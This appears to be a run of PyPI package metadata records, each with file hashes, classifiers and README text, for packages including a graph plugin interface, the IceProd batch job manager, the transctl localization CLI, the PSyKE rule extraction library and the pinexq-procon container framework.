3e/8e/18347237d28e534b26edc51d67856db6af852c74add4f80c94bc38d42878/asam_qc_framework-1.1.0.tar.gz
source
sdist
null
false
fc949589395c7c32312dbfce2589bbe4
b3af9c05340c59b351f9d075cf7af953e7fa92b5e250df00c4d802f5c5b9a6a0
3e8e18347237d28e534b26edc51d67856db6af852c74add4f80c94bc38d42878
null
[]
240
2.2
cjm-graph-plugin-system
0.0.5
Defines the standardized interface and data structures for Context Graph plugins, enabling the semantic linking, decomposition, and enrichment of multi-modal content.
# cjm-graph-plugin-system <!-- WARNING: THIS FILE WAS AUTOGENERATED! DO NOT EDIT! --> ## Install ``` bash pip install cjm_graph_plugin_system ``` ## Project Structure nbs/ ├── utils/ (2) │ ├── mermaid.ipynb # Convert GraphContext objects to Mermaid.js diagram strings for visualization │ └── slices.ipynb # Typed slice dataclasses for specifying referenced content regions in SourceRef ├── core.ipynb # DTOs for Context Graph operations with FileBackedDTO support for zero-copy transfer └── plugin_interface.ipynb # Domain-specific plugin interface for Context Graphs Total: 4 notebooks across 1 directory ## Module Dependencies ``` mermaid graph LR core[core<br/>Core Data Structures] plugin_interface[plugin_interface<br/>Graph Plugin Interface] utils_mermaid[utils.mermaid<br/>Mermaid Diagram Generation] utils_slices[utils.slices<br/>Segment Slice Specifications] plugin_interface --> core utils_mermaid --> core utils_slices --> core ``` *3 cross-module dependencies detected* ## CLI Reference No CLI commands found in this project. ## Module Overview Detailed documentation for each module in the project: ### Core Data Structures (`core.ipynb`) > DTOs for Context Graph operations with FileBackedDTO support for > zero-copy transfer #### Import ``` python from cjm_graph_plugin_system.core import ( SourceRef, GraphNode, GraphEdge, GraphContext, GraphQuery ) ``` #### Classes ``` python @dataclass class SourceRef: "A pointer to external data in another plugin's domain." plugin_name: str # e.g., "cjm-transcription-plugin-voxtral-hf" table_name: str # e.g., "transcriptions" row_id: str # e.g., "b0ceddd3-..." 
(typically a job_id) content_hash: str # Hash of consumed content in "algo:hexdigest" format segment_slice: Optional[str] # Optional slice: "char:0-500" or "timestamp:00:10-00:20" def to_dict(self) -> Dict[str, Any]: # Dictionary representation for JSON serialization "Convert to dictionary." def verify( self, current_content: bytes # Current content bytes to verify against stored hash ) -> bool: # True if content matches the stored hash "Check if referenced content still matches the stored hash." def compute_hash( content: bytes, # Content to hash algo: str = "sha256" # Hash algorithm name ) -> str: # Hash string in "algo:hexdigest" format "Compute a content hash string for use in SourceRef." ``` ``` python @dataclass class GraphNode: "Represents an entity in the Context Graph." id: str # UUID label: str # e.g., "Person", "Concept", "Correction" properties: Dict[str, Any] = field(...) # Arbitrary metadata sources: List[SourceRef] = field(...) # Links to external plugins created_at: Optional[float] # Unix timestamp when created updated_at: Optional[float] # Unix timestamp when last updated def to_dict(self) -> Dict[str, Any]: # Dictionary representation for JSON serialization "Convert to dictionary with nested sources." ``` ``` python @dataclass class GraphEdge: "Represents a relationship between two nodes." id: str # UUID source_id: str # Origin node UUID target_id: str # Destination node UUID relation_type: str # e.g., "MENTIONS", "CORRECTS", "AUTHORED_BY" properties: Dict[str, Any] = field(...)
# Arbitrary metadata created_at: Optional[float] # Unix timestamp when created updated_at: Optional[float] # Unix timestamp when last updated def to_dict(self) -> Dict[str, Any]: # Dictionary representation for JSON serialization "Convert to dictionary." ``` ``` python @dataclass class GraphContext: "Container for graph query results (a subgraph)." nodes: List[GraphNode] # Nodes in the subgraph edges: List[GraphEdge] # Edges in the subgraph metadata: Dict[str, Any] = field(...) # Query metadata, stats, etc. def to_temp_file(self) -> str: # Absolute path to temporary JSON file "Save graph data to a temp file for zero-copy transfer." def to_dict(self) -> Dict[str, Any]: # Dictionary representation for JSON serialization "Convert to dictionary." def from_file( cls, filepath: str # Path to JSON file ) -> "GraphContext": # Reconstructed GraphContext "Load graph context from a JSON file." def from_dict( cls, data: Dict[str, Any] # Dictionary with nodes, edges, metadata ) -> "GraphContext": # Reconstructed GraphContext "Load graph context from a dictionary." ``` ``` python @dataclass class GraphQuery: "A standardized query object for graph operations." query: str # Raw query string (SQL, Cypher, etc.) parameters: Dict[str, Any] = field(...) # Query parameters limit: int = 100 # Max results to return depth: int = 1 # Traversal depth for neighborhood queries def to_dict(self) -> Dict[str, Any]: # Dictionary representation for JSON serialization "Convert to dictionary."
``` ### Mermaid Diagram Generation (`mermaid.ipynb`) > Convert GraphContext objects to Mermaid.js diagram strings for > visualization #### Import ``` python from cjm_graph_plugin_system.utils.mermaid import ( context_to_mermaid ) ``` #### Functions ``` python def context_to_mermaid( ctx: GraphContext, # The GraphContext to visualize direction: str = "TD", # Diagram direction: "TD" (top-down) or "LR" (left-right) node_color_map: Optional[Dict[str, str]] = None # Map of node labels to CSS colors ) -> str: # Mermaid.js diagram string "Convert a GraphContext into a Mermaid.js diagram string." ``` ### Graph Plugin Interface (`plugin_interface.ipynb`) > Domain-specific plugin interface for Context Graphs #### Import ``` python from cjm_graph_plugin_system.plugin_interface import ( GraphPlugin ) ``` #### Classes ``` python class GraphPlugin(PluginInterface): "Abstract base class for all Context Graph plugins." def execute( self, action: str = "get_schema", # Action to perform (see docstring for available actions) **kwargs ) -> Dict[str, Any]: # JSON-serializable result "Execute a graph operation. This is the main entry point for RemotePluginProxy. Dispatches to the appropriate method based on `action` parameter. All return values are JSON-serializable dictionaries for HTTP transport." def add_nodes( self, nodes: List[GraphNode] # Nodes to create ) -> List[str]: # Created node IDs "Bulk create nodes." def add_edges( self, edges: List[GraphEdge] # Edges to create ) -> List[str]: # Created edge IDs "Bulk create edges." def get_node( self, node_id: str # UUID of node to retrieve ) -> Optional[GraphNode]: # Node or None if not found "Get a single node by ID." def get_edge( self, edge_id: str # UUID of edge to retrieve ) -> Optional[GraphEdge]: # Edge or None if not found "Get a single edge by ID." 
def get_context( self, node_id: str, # Starting node UUID depth: int = 1, # Traversal depth (1 = immediate neighbors) filter_labels: Optional[List[str]] = None # Only include nodes with these labels ) -> GraphContext: # Subgraph containing node and its neighborhood "Get the neighborhood of a specific node." def find_nodes_by_source( self, source_ref: SourceRef # External resource reference ) -> List[GraphNode]: # Nodes attached to this source "Find all nodes linked to a specific external resource." def find_nodes_by_label( self, label: str, # Node label to search for limit: int = 100 # Max results ) -> List[GraphNode]: # Matching nodes "Find nodes by label." def update_node( self, node_id: str, # UUID of node to update properties: Dict[str, Any] # Properties to merge/update ) -> bool: # True if successful "Partial update of node properties." def update_edge( self, edge_id: str, # UUID of edge to update properties: Dict[str, Any] # Properties to merge/update ) -> bool: # True if successful "Partial update of edge properties." def delete_nodes( self, node_ids: List[str], # UUIDs of nodes to delete cascade: bool = True # Also delete connected edges ) -> int: # Number of nodes deleted "Delete nodes (and optionally connected edges)." def delete_edges( self, edge_ids: List[str] # UUIDs of edges to delete ) -> int: # Number of edges deleted "Delete edges." def get_schema(self) -> Dict[str, Any]: # Graph schema/ontology "Return the current ontology/schema of the graph."
def import_graph( self, graph_data: GraphContext, # Data to import merge_strategy: str = "overwrite" # "overwrite", "skip", or "merge" ) -> Dict[str, int]: # Import statistics {nodes_created, edges_created, ...} "Bulk import a GraphContext (e.g., from backup or another plugin)." def export_graph( self, filter_query: Optional[GraphQuery] = None # Optional filter ) -> GraphContext: # Exported subgraph or full graph "Export the entire graph or a filtered subset." ``` ### Segment Slice Specifications (`slices.ipynb`) > Typed slice dataclasses for specifying referenced content regions in > SourceRef #### Import ``` python from cjm_graph_plugin_system.utils.slices import ( SliceSpec, CharSlice, TimestampSlice, FrameSlice, PageSlice, LineSlice, FullContent, parse_slice ) ``` #### Functions ``` python def parse_slice( s: str # Slice string to parse (e.g., "char:0-500", "timestamp:10.5-30.0") ) -> SliceSpec: # Parsed slice specification "Parse a slice string into a typed SliceSpec." ``` #### Classes ``` python @runtime_checkable class SliceSpec(Protocol): "Protocol for typed segment slice specifications." def to_slice_string(self) -> str: # Serialized slice string for SourceRef.segment_slice "Serialize to a slice string." ``` ``` python @dataclass class CharSlice: "Character-range slice for text content." start: int # Start character index (0-indexed) end: int # End character index (exclusive) def to_slice_string(self) -> str: # e.g., "char:0-500" "Serialize to slice string." ``` ``` python @dataclass class TimestampSlice: "Temporal slice for audio/video content." start: float # Start time in seconds end: float # End time in seconds def to_slice_string(self) -> str: # e.g., "timestamp:10.5-30.0" "Serialize to slice string." ``` ``` python @dataclass class FrameSlice: "Frame-range slice for video content." start: int # Start frame number end: int # End frame number def to_slice_string(self) -> str: # e.g., "frame:0-120" "Serialize to slice string." 
``` ``` python @dataclass class PageSlice: "Page slice for document content (PDFs, EPUBs)." page: int # Page number (1-indexed) bbox: Optional[str] # Optional bounding box "x1,y1,x2,y2" def to_slice_string(self) -> str: # e.g., "page:3" or "page:3:bbox:10,20,300,400" "Serialize to slice string." ``` ``` python @dataclass class LineSlice: "Line-range slice for code or structured text." start: int # Start line number (0-indexed) end: int # End line number (exclusive) def to_slice_string(self) -> str: # e.g., "line:10-25" "Serialize to slice string." ``` ``` python @dataclass class FullContent: "Reference to complete content (no slicing)." content_type: str = 'text' # Content type: "text", "audio", "image", etc. def to_slice_string(self) -> str: # e.g., "full_text", "full_audio" "Serialize to slice string." ```
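The `content_hash` contract documented for `SourceRef` (an `"algo:hexdigest"` string that `verify` checks against the referenced bytes) can be sketched with nothing but `hashlib`. This is a standalone illustration of the documented behavior, not the package's own code:

```python
import hashlib

def compute_hash(content: bytes, algo: str = "sha256") -> str:
    # "algo:hexdigest" format, as documented for SourceRef.content_hash
    return f"{algo}:{hashlib.new(algo, content).hexdigest()}"

def verify(stored_hash: str, current_content: bytes) -> bool:
    # Re-hash with the algorithm named in the stored string, compare digests
    algo, _, digest = stored_hash.partition(":")
    return hashlib.new(algo, current_content).hexdigest() == digest

h = compute_hash(b"transcript segment")
print(verify(h, b"transcript segment"))  # True: content unchanged
print(verify(h, b"edited segment"))      # False: referenced content drifted
```

Storing the algorithm name inside the hash string lets a graph node outlive a change of default algorithm: each `SourceRef` carries enough information to re-verify itself.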
text/markdown
Christian J. Mills
9126128+cj-mills@users.noreply.github.com
null
null
Apache Software License 2.0
nbdev jupyter notebook python
[ "Development Status :: 4 - Beta", "Intended Audience :: Developers", "Natural Language :: English", "Programming Language :: Python :: 3.12", "License :: OSI Approved :: Apache Software License" ]
[]
https://github.com/cj-mills/cjm-graph-plugin-system
null
>=3.12
[]
[]
[]
[ "cjm_plugin_system" ]
[]
[]
[]
[]
twine/6.2.0 CPython/3.12.12
2026-02-19T22:25:51.960809
cjm_graph_plugin_system-0.0.5.tar.gz
18,635
03/71/2d75a6ef65bf56433a99c85ad755376bd76f7dcdfb0e127535bed7d00ad3/cjm_graph_plugin_system-0.0.5.tar.gz
source
sdist
null
false
83d463b8100d2c9eb52aadcb41c5ccba
e6f68076baac691e18e78da2376164013f74b1861292961ae309f2963cab3e4a
03712d75a6ef65bf56433a99c85ad755376bd76f7dcdfb0e127535bed7d00ad3
null
[]
298
2.4
iceprod
3.2.21
IceCube dataset management system
IceProd ======= .. image:: https://zenodo.org/badge/58235078.svg :target: https://zenodo.org/badge/latestdoi/58235078 IceProd is a Python framework for distributed management of batch jobs. It runs as a layer on top of other batch middleware, such as HTCondor, and can pool together resources from different batch systems. The primary purpose is to coordinate and administer many large sets of jobs at once, keeping a history of the entire job lifecycle. See also: Aartsen, Mark G., et al. "The IceProd framework: Distributed data processing for the IceCube neutrino observatory." Journal of parallel and distributed computing 75 (2015): 198-211. **Note:** For IceCube users with CVMFS access, IceProd is already installed. To load the environment execute:: /cvmfs/icecube.wisc.edu/iceprod/latest/env-shell.sh or:: eval `/cvmfs/icecube.wisc.edu/iceprod/latest/setup.sh` depending on whether you want to get a new shell or load the variables into the current shell. Installation ------------ **Platforms**: IceProd should run on any Unix-like platform, although only Linux has been extensively tested and can be recommended for production deployment. **Prerequisites**: Listed here are required packages that are not installed via pip: * Python 3.7+ * MongoDB 3.6+ (for the REST API) * nginx (for ssl offloading and better security) * globus (for data transfer) **Installation**: From the latest release: Get the tarball link from https://github.com/WIPACrepo/iceprod/releases/latest Then install like:: pip install https://github.com/WIPACrepo/iceprod/archive/v2.0.0.tar.gz **Installing from master**: If you must install the dev version from master, do:: pip install --upgrade git+git://github.com/WIPACrepo/iceprod.git#egg=iceprod
text/x-rst
null
WIPAC Developers <developers@icecube.wisc.edu>
null
null
null
WIPAC, batch, workload
[ "Programming Language :: Python :: 3.12", "Programming Language :: Python :: 3.13", "Programming Language :: Python :: 3.14" ]
[]
null
null
<3.15,>=3.12
[]
[]
[]
[ "PyYAML", "asyncache", "boto3<1.36", "cachetools", "certifi", "cryptography", "htcondor>=25.3.1", "httpx", "jsonschema", "ldap3", "prometheus-client", "psutil", "pymongo>=4.13", "python-dateutil", "requests", "requests-futures", "requests-toolbelt", "setproctitle", "tornado", "...
[]
[]
[]
[ "Homepage, https://pypi.org/project/iceprod/", "Tracker, https://github.com/WIPACrepo/iceprod/issues", "Source, https://github.com/WIPACrepo/iceprod" ]
twine/6.1.0 CPython/3.13.7
2026-02-19T22:25:32.190263
iceprod-3.2.21.tar.gz
6,626,953
78/15/fd84467ff8b248d99ae567257ea7ba7212601667b9fc9eedbc174661bcbd/iceprod-3.2.21.tar.gz
source
sdist
null
false
a9e8d459d6d1cec59a850a9729b2e248
c47294d0e646e2ec5bd22995064565ffdbf827bbaefe87f2c3155b4eb596b53f
7815fd84467ff8b248d99ae567257ea7ba7212601667b9fc9eedbc174661bcbd
MIT
[ "LICENSE" ]
249
2.4
transctl
1.0.2
A command-line tool for managing application localization and generating translations using machine translation services.
# transctl > A pragmatic localization CLI ⚙️ `transctl` is a command-line tool for managing application translation workflows. It scans source files, extracts translatable content, translates it using a configured machine translation provider, and writes translated output files according to your project structure. The tool maintains a local manifest and translation memory to avoid unnecessary retranslations across runs. --- ## Installation Requires **Python ≥ 3.11**. Install from PyPI: ```bash pip install transctl ``` --- ## Quick Start Initialize a configuration file: ```bash transctl init ``` Run the translation workflow: ```bash transctl run ``` That’s the minimal happy path. Use: ```bash transctl --help ``` to explore additional commands. --- ## What It Does `transctl`: - Scans configured resource directories - Extracts translatable content from files - Translates content into one or more target locales - Writes translated output files (never overwrites the source file) - Skips unchanged files using a generated `manifest.json` - Maintains a local SQLite-based translation memory - Supports optional glossary injection - Supports placeholder protection using `{{placeholder}}` syntax --- ## Avoiding Unnecessary Retranslations Two mechanisms are used: ### 1. Translation Manifest (`manifest.json`) After each run, a `manifest.json` file is generated automatically. It tracks file state to skip unchanged files in subsequent runs. If the manifest is deleted or purged, files may be reprocessed. --- ### 2. Local Translation Memory (SQLite) A local SQLite database stores translated segments to prevent repeated translation of identical content across runs. - Automatically created and maintained - Oldest entries may be pruned when the file grows too large - Can be purged manually via `transctl purge` If deleted, memory will rebuild over time. --- ## Configuration The `.transctl.toml` file is required for operation. 
If `transctl init` is executed and a configuration file already exists, no changes are made. --- ### Example Configuration ```toml [locale] source = "en" targets = [ "fr", ] [engine] provider = "deepl" [resources.html] dirs = [ { path = "templates/*", layout = "along-sided" } ] [resources.json] dirs = [ { path = "locales/[source].*.json"} ] ``` --- ### Locale ```toml [locale] source = "en" targets = ["fr"] ``` - `source` — source language - `targets` — one or more target languages --- ### Engine ```toml [engine] provider = "deepl" ``` Supported providers: - `deepl` - `azure` Engine-specific parameters can be provided interactively or via CLI flags. **Note**: The `auth_key` of all engines must be provided as an environment variable. #### DeepL Required parameters: None Example (non-interactive): ```bash transctl init -y \ -e deepl ``` #### Azure Required parameters: - `region` — Azure resource region Example (non-interactive): ```bash transctl init -y \ -e azure \ --param region=$AZURE_REGION ``` --- ### Resources Resources define what files should be translated. Currently supported: - HTML - JSON Example: ```toml [resources.json] dirs = [ { path = "locales/*", layout = "along-sided" }, ] ``` --- ### Layout Behavior `layout` determines where translated files are written. Allowed values: - `along-sided` - `by-language` If omitted, the default behavior is equivalent to `along-sided`. Note that `layout=""` is not valid and will result in an error. #### along-sided If the original file is: ``` i18n.json ``` The translated file becomes: ``` fr_i18n.json ``` --- #### by-language Keeps the original filename but creates a language directory: ``` locales/en/i18n.json → locales/fr/i18n.json ``` --- ## Placeholder Protection To prevent specific content from being translated, wrap it in: ``` {{placeholder}} ``` Anything inside `{{}}` is preserved. --- ## Glossary Support A glossary file can be provided as a simple JSON key-value mapping. Example: ```json { "Key": "Value" } ```
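The `{{placeholder}}` protection described above can be approximated with a simple mask-and-restore pass: opaque tokens replace the protected spans before the text goes to the machine-translation provider, and the originals are swapped back in afterwards. The regex and token format below are illustrative assumptions, not `transctl`'s actual implementation:

```python
import re

# Matches {{...}} spans, as documented; illustrative, not transctl's regex
PLACEHOLDER = re.compile(r"\{\{.*?\}\}")

def protect(text: str):
    # Replace each {{...}} span with an opaque token the MT engine leaves alone
    spans = PLACEHOLDER.findall(text)
    for i, span in enumerate(spans):
        text = text.replace(span, f"[[PH{i}]]", 1)
    return text, spans

def restore(text: str, spans):
    # Swap the original spans back in after translation
    for i, span in enumerate(spans):
        text = text.replace(f"[[PH{i}]]", span, 1)
    return text

masked, spans = protect("Hello {{user_name}}, you have {{count}} messages.")
print(masked)                  # Hello [[PH0]], you have [[PH1]] messages.
print(restore(masked, spans))  # Hello {{user_name}}, you have {{count}} messages.
```

A real implementation would also have to guarantee that the chosen token survives the provider's tokenization untranslated, which is why opaque bracketed markers are a common choice.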
text/markdown
null
null
null
null
null
null
[]
[]
null
null
>=3.11
[]
[]
[]
[ "click~=8.3.1", "deepl~=1.27.0", "pydantic~=2.12.5", "click~=8.3.1", "bs4~=0.0.2", "beautifulsoup4~=4.14.3", "tomli~=2.4.0", "typing_extensions~=4.15.0", "tomli_w~=1.2.0", "SQLAlchemy~=2.0.46", "azure-ai-translation-text~=1.0.1", "json5~=0.13.0", "pytest; extra == \"dev\"", "ruff; extra ==...
[]
[]
[]
[]
twine/6.1.0 CPython/3.13.7
2026-02-19T22:24:52.518292
transctl-1.0.2.tar.gz
33,296
3e/3e/28111347eced139959e902e50e3c1d72ae0dd85a656c2601f3eda0491685/transctl-1.0.2.tar.gz
source
sdist
null
false
406d4395a6f5f24c99e2d7fafa261ed3
0487be10086eef0e32964f118ef0b57d7077db1e2156c4bd9e360afde7f72c9f
3e3e28111347eced139959e902e50e3c1d72ae0dd85a656c2601f3eda0491685
null
[ "LICENSE" ]
236
2.4
psyke
1.0.4.dev24
Python-based implementation of PSyKE, i.e. a Platform for Symbolic Knowledge Extraction
# PSyKE ![PSyKE Logo](.img/logo-wide.png) Quick links: * [Home Page](https://apice.unibo.it/xwiki/bin/view/PSyKE/) * [GitHub Repository](https://github.com/psykei/psyke-python) * [PyPi Repository](https://pypi.org/project/psyke/) * [Issues](https://github.com/psykei/psyke-python/issues) ## Latest Releases * PSyKE 1.0: Compatibility with Python 3.11.x * PSyKE 0.10: New genetic algorithms for knowledge extraction * PSyKE 0.9: Fairness mitigation support for knowledge extractors * PSyKE 0.8: New features: local explainability and counterfactual support * PSyKE 0.7: New SKE algorithms implemented ## Intro [PSyKE](https://apice.unibo.it/xwiki/bin/view/PSyKE/) (Platform for Symbolic Knowledge Extraction) is intended as a library for extracting symbolic knowledge (in the form of logic rule lists) out of sub-symbolic predictors. More precisely, PSyKE offers a general purpose API for knowledge extraction, and a number of different algorithms implementing it, supporting both classification and regression problems. The extracted knowledge consists of a Prolog theory (i.e., a list of Horn clauses) or an OWL ontology containing SWRL rules. PSyKE relies on [2ppy](https://github.com/tuProlog/2ppy) (tuProlog in Python) for logic support, which in turn is based on the [2p-Kt](https://github.com/tuProlog/2p-kt) logic ecosystem.
### Class diagram overview: ![PSyKE class diagram](http://www.plantuml.com/plantuml/svg/PLBBRkem4DtdAqQixeLcqsN40aHfLQch2dM341gS0IpoY3oJYfJctnl7RkgcKZRdCUFZ4ozOq4YTPr65we8dWlkgQcuHmEPCfMbW6iDaEe5LXZLJr4QHof3PgxVMGoTtS5XJSNCXkwVxlhdUguzQeUYoi28u3bxNovS0RWnLM7H46mNZXaw6c4UZpq8cW4z6ftGTZoeq4WwjB6x7BbPdoZ7qFMXMXeGU2QKsv2I06HmTiIymfmHOpA1WccjcVSXe_uvPJPn0gfLiEyyTl5bcrtk7qzTNCQYaDBxhyQ6_BFFFEExJ_sLzXoFMLpdcVMrZrhVNvS83zygFmrv-1fMXL5lOezH5rH_z7qqWqonRbn-72-nwAxaz_r8KP9B_YNz3uTP0jFcmAt6xB9gT3UJSC8_Z87G2PIrLBL0UemKLQPrdNm00) <!-- To generate/edit the class diagram browse the URL above, after replacing `svg` with `uml` --> PSyKE is designed around the notion of _extractor_. More precisely, an `Extractor` is any object capable of extracting a logic `Theory` out of a trained sub-symbolic regressor or classifier. Accordingly, an `Extractor` is composed of _(i)_ a trained predictor (i.e., a black box used as an oracle) and _(ii)_ a set of feature descriptors, and it provides two methods: * `extract`: returns a logic theory given a dataset; * `predict`: predicts a value using the extracted rules (instead of the original predictor). Currently, the supported extraction algorithms are: * [CART](https://doi.org/10.1201/9781315139470), which straightforwardly extracts rules from both classification and regression decision trees; * Classification: * [REAL](http://dx.doi.org/10.1016/B978-1-55860-335-6.50013-1) (Rule Extraction As Learning), generates and generalizes rules starting from dataset samples; * [Trepan](http://dx.doi.org/10.1016/B978-1-55860-335-6.50013-1), generates rules by inducing a decision tree and possibly exploiting m-of-n expressions; * Regression: * [ITER](http://dx.doi.org/10.1007/11823728_26), builds and iteratively expands hypercubes in the input space. 
Each cube holds a constant value, which is the estimated output for the samples inside the cube; * [GridEx](http://dx.doi.org/10.1007/978-3-030-82017-6_2), extension of the ITER algorithm that produces shorter rule lists retaining higher fidelity w.r.t. the predictor. * GridREx, extension of GridEx where the output of each hypercube is a linear combination of the input variables and not a constant value. Users may exploit the PEDRO algorithm, included in PSyKE, to tune the optimal values for GridEx and GridREx hyper-parameters. We are working on PSyKE to extend its features to encompass explainable clustering tasks, as well as to make the supported extraction algorithms more general-purpose (e.g., by adding classification support to GridEx and GridREx). ## Users ### End users PSyKE is deployed as a library on PyPI. It can be installed as a Python package by running: ```bash pip install psyke ``` #### Requirements Please refer to the [requirements file](https://github.com/psykei/psyke-python/blob/master/requirements.txt) ##### Test requirements * `skl2onnx` * `onnxruntime` * `parameterized` Once installed, it is possible to create an extractor from a predictor (e.g. Neural Network, Support Vector Machine, K-Nearest Neighbours, Random Forest, etc.) and from the data set used to train the predictor. > **Note:** the predictor must expose a method named `predict` to be properly used as an oracle. #### End users A brief example is presented in the `demo.py` script in the `demo/` folder. Using `sklearn`'s Iris data set we train a K-Nearest Neighbours classifier to predict the correct output class. Before training, we make the dataset discrete. After that, we create two different extractors: REAL and Trepan. We output the extracted theory for both extractors. REAL extracted rules: ``` iris(PetalLength, PetalWidth, SepalLength, SepalWidth, setosa) :- PetalWidth =< 1.0. iris(PetalLength1, PetalWidth1, SepalLength1, SepalWidth1, versicolor) :- PetalLength1 > 4.9, SepalWidth1 in [2.9, 3.2]. 
iris(PetalLength2, PetalWidth2, SepalLength2, SepalWidth2, versicolor) :- PetalWidth2 > 1.6. iris(PetalLength3, PetalWidth3, SepalLength3, SepalWidth3, virginica) :- SepalWidth3 =< 2.9. iris(PetalLength4, PetalWidth4, SepalLength4, SepalWidth4, virginica) :- SepalLength4 in [5.4, 6.3]. iris(PetalLength5, PetalWidth5, SepalLength5, SepalWidth5, virginica) :- PetalWidth5 in [1.0, 1.6]. ``` Trepan extracted rules: ``` iris(PetalLength6, PetalWidth6, SepalLength6, SepalWidth6, virginica) :- PetalLength6 > 3.0, PetalLength6 in [3.0, 4.9]. iris(PetalLength7, PetalWidth7, SepalLength7, SepalWidth7, versicolor) :- PetalLength7 > 3.0. iris(PetalLength8, PetalWidth8, SepalLength8, SepalWidth8, setosa) :- true. ``` ## Developers Working with the PSyKE codebase requires a number of tools to be installed: * Python 3.11+ (Python versions >= `3.12.x` are currently __not__ supported) * JDK 11+ (please ensure the `JAVA_HOME` environment variable is properly configured) * Git 2.20+ ### Develop PSyKE with PyCharm To participate in the development of PSyKE, we suggest the [PyCharm](https://www.jetbrains.com/pycharm/) IDE. #### Importing the project 1. Clone this repository into a folder of your preference using `git clone` 2. Open PyCharm 3. Select `Open` 4. Navigate your file system and find the folder where you cloned the repository 5. Click `Open` ### Developing the project Contributions to this project are welcome. 
Just some rules: * We use [git flow](https://github.com/nvie/gitflow), so if you write new features, please do so in a separate `feature/` branch * We recommend forking the project, developing your code, then contributing back via pull request * Commit often * Stay in sync with the `develop` (or `master`) branch (pull frequently if the build passes) * Do not introduce low-quality or untested code #### Issue tracking If you encounter problems while using or developing PSyKE, please report them through the project ["Issues" section](https://github.com/psykei/psyke-python/issues) on GitHub.
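The extracted rule lists above act as a transparent stand-in for the original predictor: rules are tried in order and the first match wins. A minimal pure-Python sketch of that `predict`-from-rules idea (thresholds copied from the REAL output above; this is an illustration, not PSyKE's actual API):

```python
# Each rule: (list of (feature, test) conditions, predicted class).
# Thresholds mirror the REAL rule list shown above.
rules = [
    ([("petal_width", lambda v: v <= 1.0)], "setosa"),
    ([("petal_length", lambda v: v > 4.9),
      ("sepal_width", lambda v: 2.9 <= v <= 3.2)], "versicolor"),
    ([("petal_width", lambda v: v > 1.6)], "versicolor"),
    ([("sepal_width", lambda v: v <= 2.9)], "virginica"),
]

def predict(sample, rules, default="virginica"):
    """Apply rules in order; the first whose conditions all hold wins."""
    for conditions, label in rules:
        if all(test(sample[feature]) for feature, test in conditions):
            return label
    return default

sample = {"petal_length": 1.4, "petal_width": 0.2,
          "sepal_length": 5.1, "sepal_width": 3.5}
print(predict(sample, rules))  # → setosa
```

This ordered-evaluation semantics is what makes a flat rule list equivalent to a Prolog theory of Horn clauses tried top to bottom.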
text/markdown
Matteo Magnini
matteo.magnini@unibo.it
null
null
Apache 2.0 License
knowledge extraction, symbolic ai, ske, extractor, rules, prolog
[ "Development Status :: 3 - Alpha", "Intended Audience :: Developers", "Topic :: Software Development :: Libraries", "Topic :: Scientific/Engineering :: Artificial Intelligence", "License :: OSI Approved :: Apache Software License", "Programming Language :: Python :: 3", "Programming Language :: Python :...
[ "Independent" ]
https://github.com/psykei/psyke-python
null
==3.11
[]
[]
[]
[ "numpy~=2.3.4", "pandas~=3.0.0", "scikit-learn~=1.8.0", "2ppy~=0.4.0", "kneed~=0.8.1", "sympy~=1.11" ]
[]
[]
[]
[ "Bug Reports, https://github.com/psykei/psyke-python/issues", "Source, https://github.com/psykei/psyke-python" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T22:24:49.400660
psyke-1.0.4.dev24.tar.gz
74,341
0d/16/00979c6ec69562d0a8cb5830f99751b0170fb56e63ac2f3ac5c214bc6e9a/psyke-1.0.4.dev24.tar.gz
source
sdist
null
false
66201efd9e83f434019c4a9673a83093
90cc807af110ca5d2378abb4fc67a85b4fc9e3bff1dfb5d00044bf732a2fef10
0d1600979c6ec69562d0a8cb5830f99751b0170fb56e63ac2f3ac5c214bc6e9a
null
[ "LICENSE" ]
215
2.3
pinexq-procon
2.5.1
Framework to create containers for DataCybernetic's PineXQ computing platform
# PineXQ ProCon Framework Computations in DC-Cloud are done by **Workers** running inside a **ProcessingContainer**, or "ProCon" for short, which is also the name of the framework. ProCon provides an unobtrusive wrapper around function definitions without introducing new semantics, allowing for a clean definition of the computational task, while handling all cloud-related communication and data management transparently in the background. This keeps cloud-specific code and configuration out of the function implementation. ### Installation To install the package from a package feed, use `pip`: ``` pip install pinexq-procon ``` ### Creating a container To publish a function in a container, it must be a method of a class inheriting from the `Step` class. ```python from pinexq.procon.step import Step # import package class MyStepCollection(Step): # define the container class def calculate_square(self, x: float) -> float: # define a step function """Calculate the square of x :param x: a float number :returns: the square of x """ return x ** 2 # More step functions can go in the same class if __name__ == '__main__': # add script guard MyStepCollection() # run the container - this will spawn the cli ``` It is mandatory to annotate the types of parameters and return value. Docstrings are optional, but highly recommended. The [documentation](doc/ProCon.md) has a detailed section about [implementing processing-steps](doc/Implementing-a-Step.md). ### Running a Step-function locally The Python file with the container is itself a cli-tool. You get a list of all available commands with the `--help` parameter. ``` python ./my_step_file.py --help ``` With the `run` option you can call a function in the container directly, and the result is written to the console. ``` python ./my_step_file.py run --function calculate_square --parameters "{'x': 5}" 25 ``` You can find a full list of available commands in the [cli documentation](doc/Using-Procon-From-Cli.md). 
All possible parameters and environment variables are listed [here](doc/Parameters.md).
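The mandatory type annotations are what let a framework like this derive the CLI and data interface automatically from a step's signature. A rough illustration of that kind of introspection using only the standard library (`describe_step` is a hypothetical helper for illustration, not part of ProCon):

```python
import inspect

def describe_step(func):
    """Sketch: derive parameter metadata from a step function's signature."""
    sig = inspect.signature(func)
    params = {name: p.annotation.__name__
              for name, p in sig.parameters.items() if name != "self"}
    return {"name": func.__name__,
            "params": params,
            "returns": sig.return_annotation.__name__}

def calculate_square(self, x: float) -> float:
    """Calculate the square of x"""
    return x ** 2

print(describe_step(calculate_square))
# {'name': 'calculate_square', 'params': {'x': 'float'}, 'returns': 'float'}
```

From metadata like this, a wrapper can both generate `--help` output and validate/convert the `--parameters` payload before invoking the step.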
text/markdown
Sebastian Höfer, Carsten Blank, Mathias Reichardt
Sebastian Höfer <hoefer@data-cybernetics.com>, Carsten Blank <blank@data-cybernetics.com>, Mathias Reichardt <reichardt@data-cybernetics.com>
null
null
Copyright (C) data cybernetics ssc GmbH - All Rights Reserved <contactus@data-cybernetics.com>, December 2023
null
[]
[]
null
null
>=3.11
[]
[]
[]
[ "aio-pika==9.5.5", "click>=8.1.3", "docstring-parser==0.*", "httpx-caching>=0.1a4", "httpx==0.*", "pinexq-client>=1.0.0", "pydantic>=2.10.0", "pyjwt>=2.10.0", "rich>=13.3.2", "stamina>=24.2.0" ]
[]
[]
[]
[]
twine/6.2.0 CPython/3.13.9
2026-02-19T22:24:11.607671
pinexq_procon-2.5.1-py3-none-any.whl
57,816
